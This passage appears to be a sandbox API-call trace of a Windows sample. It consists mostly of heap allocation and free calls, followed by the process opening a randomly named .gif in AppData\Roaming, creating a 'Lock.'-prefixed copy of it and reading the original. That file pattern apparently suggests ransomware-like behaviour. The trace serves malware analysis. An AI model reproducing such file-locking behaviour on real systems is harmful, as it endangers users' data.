0x2e51520 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0230.868] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0230.868] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0230.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0230.870] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0230.870] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0230.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f620 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f828 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f9b8 | out: hHeap=0x970000) returned 1 [0230.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f508 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f918 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f8c8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f940 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f580 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0230.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0230.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0230.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0230.873] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503c8 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0230.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0230.873] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0dd0 [0230.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0230.874] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0230.874] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/FDKSrtwPMRhz2PyeAx.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\fdksrtwpmrhz2pyeax.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0230.875] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.875] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0230.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503c8 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0230.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.875] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.875] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0230.875] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0230.876] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0230.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0230.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0230.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0230.876] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0230.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0230.876] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0230.876] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0230.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0230.878] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0230.878] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.FDKSrtwPMRhz2PyeAx.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.fdksrtwpmrhz2pyeax.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0230.879] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0230.879] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503e0 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0230.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0230.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0230.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0230.880] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0230.880] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0230.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0230.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0230.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5f020 [0230.885] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0230.885] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x3baa, lpOverlapped=0x0) returned 1 [0230.894] ReadFile (in: hFile=0x2d0, lpBuffer=0x3be0dd0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x3be0dd0*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0230.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0230.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0230.894] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0230.894] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 